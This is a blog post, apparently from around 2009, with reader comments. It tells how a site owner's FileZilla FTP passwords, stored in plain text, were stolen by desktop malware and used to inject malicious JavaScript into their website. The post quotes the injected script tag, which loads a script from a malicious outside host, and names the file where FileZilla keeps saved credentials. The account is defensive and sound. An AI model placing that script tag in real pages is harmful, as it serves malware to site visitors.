Filezilla Security Issues - Hackers are exploiting it

 I love filezilla, but what happened this month will make me to rethink if I need another ftp program. I am using filezilla 3.1.3.1 client on my PC. Suddenly one good day when I tried to access one of my website,Firefox gave warning as "Reported attack page". When you see this type of issue with your webpage your heartbeat increases.It means youe Web server is hacked!!

I used wget tool to download default page of the concerned web SITE.Found page was infected with 2 identical pieces of javascript code.One at the top of the page other at the bottom.

<script type="text/javascript" src="http://iopap.1upperdarby26.com/Backup.js" type="text/javascript">
<!--6bacf8b35cab0f596815865b2df682fa-->

I logged into my server and found index.php page was infected. I cleaned it. But no luck, on client side still there were malicious javascript code.I searched in that virtual directory.And found all index.html, index.php and .js (Javascript) file had it.My intial thought was that probably that hacker might have exploited security hole in Xoops.I was using open source CMS xoops on that website and haven't updated the installation for nearly couple of years.My assumption was they might have used backdoor script for the attack.
I started looking into logs.First I tried to figure out from access log.No luck.Then what I saw big ftp log files in log directory. When I opened it I was amazed,I didn't log using ftp in last few month.But ftp log was showing files being uploaded from numerous different IP addresses.As I have not used ftp for last many month I didn't thought my desktop might be culprit (when you are running antivirus with updated you assume you are safe,huh).I contacted my hosting provider and informed them that probably the box is being exploited and compromised at their end.After a few mail exchange what I found was beyond my imagination.
My desktop was infected with a variant of Gumlar.
Possibly my antivirus couldn't catch a pdf security hole and password was stolen from FILEZILLA. Filezilla makes hacker life easy.It saves ftp site configuration in xml and password in clear text.I wish I would have known it before.I would have not bothered to save password in filezilla then. Apparently Filezilla has no plan to encrypt the password.This is unbelievable.I agree our antivirus should catch these stuff but why make hacker's life easy. In my opinion password saved in filezilla should be encrypted.Or atleast they should warn user when one try to save password in Filezilla.If you want to know which file is used to save password it is C:\Documents and Settings\<username>\Application Data\FileZilla\sitemanager.xml .Where <username > is your windows user name.
So lesson is never save password in Filezilla or probably look for other alternatives.



, ,

6 comments:

  1. I stopped using this product after reading this. This is a horrid security hole.

    ReplyDelete
  2. I agree it is a horrid security hole. But if it were to encrypt the passwords, how would it "automagically" open the file without at least a master password? It would be splendid to have at least a master password as an option. But look at any of your other applications. Likely they too store any and all passwords in plain text. Even MSN messenger does this. Oh and sure it gives the option to logon via ssl, but doesn't by default unless you modify a registry entry.

    Case in point, all password safes are "insecure" as any half decent "viruses" will read password safes.

    ReplyDelete
  3. I just wrote up a tutorial on one way to make FileZilla more secure. I was hit by a similar issue a month or so ago. Check it out...

    http://www.trailheadinteractive.com/making_filezilla_ftp_client039s_passwords_more_secure

    ReplyDelete
  4. If your computer is infected, a "virus" can steal the password when you log in by eavesdropping the local network traffic. I have already seen such infection... It has even stolen passwords used on non-infected computers in the same Ethernet collision domain. Also, ultimately, the "virus" can detect a known FTP client's login prompt and steal the password as you type.

    ReplyDelete
  5. So which FTP solution is the most secure?

    ReplyDelete
  6. I notice that most of the blame was being put on FileZilla for not encrypting its passwords and a lot of squawking about how outrageous it is that they don't/won't do so. How much did you pay for that FREE FTP client again? How about your anti-virus? If you paid for anti-virus that didn't catch a PDF security hole with viral code contained therein and didn't perform regular scans on your home computer, I think you're barking up the wrong tree. So, in closing, whining about an enterprise feature not being included in FREE software and suggesting finding an alternative because the tech support gave you an honest answer is kind of childish.

    ReplyDelete